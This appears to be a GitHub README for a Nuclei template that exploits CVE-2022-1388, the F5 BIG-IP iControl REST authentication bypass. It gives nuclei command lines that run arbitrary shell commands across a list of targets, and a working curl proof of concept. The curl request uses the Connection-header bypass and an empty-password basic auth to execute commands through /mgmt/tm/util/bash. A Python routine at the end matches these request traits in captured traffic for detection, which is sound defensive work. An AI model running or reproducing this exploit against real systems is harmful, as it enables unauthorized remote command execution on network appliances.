MrCl0wnLab / Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.


Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter


This template uses token-spray / nuclei's CLI variable

This nuclei template accepts a shell command parameter for exploitation. We wanted to test tokens obtained from another workflow or a manual search, so we used nuclei's CLI variable feature to dynamically feed a single token value or a list of tokens into these templates at run time.

-V, -var value custom vars in var=value format

nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD="uname -a"


POC Manual

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'
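
For triage, the request shape of the PoC above can be matched in captured management-plane traffic. The following Python is an added example, not part of the original repository; the function names and indicator labels are assumptions, and the sample request is constructed from the PoC's own header and body values.

```python
import base64
import json

BASH_ENDPOINT = "/mgmt/tm/util/bash"  # endpoint used by the PoC on this page
# Constructed capture that mirrors the PoC's headers and body verbatim.
SAMPLE_POC = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: localhost:8100\r\n"
    "Content-Type: application/json\r\n"
    "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a\r\n"
    "Authorization: Basic YWRtaW46\r\n\r\n"
    '{"command":"run","utilCmdArgs":"-c id"}'
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    path = lines[0].split(" ")[1].split("?")[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return path, headers, body

def indicators(raw):
    """Return the labels of the PoC traits present in one request."""
    path, headers, body = parse_request(raw)
    found = []
    if path.rstrip("/") == BASH_ENDPOINT:
        found.append("bash-endpoint")
    # The auth token header is named inside the Connection header, as in the PoC.
    if any("x-f5-auth-token" in v.lower() for v in headers.get("connection", [])):
        found.append("connection-names-auth-token")
    for value in headers.get("authorization", []):
        scheme, _, cred = value.partition(" ")
        try:
            _, sep, password = base64.b64decode(cred, validate=True).decode().partition(":")
        except ValueError:  # malformed base64 or non-UTF-8 credentials
            continue
        if scheme.lower() == "basic" and sep and not password:
            found.append("basic-empty-password")
    try:
        doc = json.loads(body)
    except ValueError:  # empty or non-JSON body
        doc = None
    if isinstance(doc, dict) and doc.get("command") == "run" and "utilCmdArgs" in doc:
        found.append("run-utilcmdargs")
    return found
```

Calling indicators(SAMPLE_POC) returns all four labels; feed it requests reconstructed from a proxy log or packet capture of the management interface.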
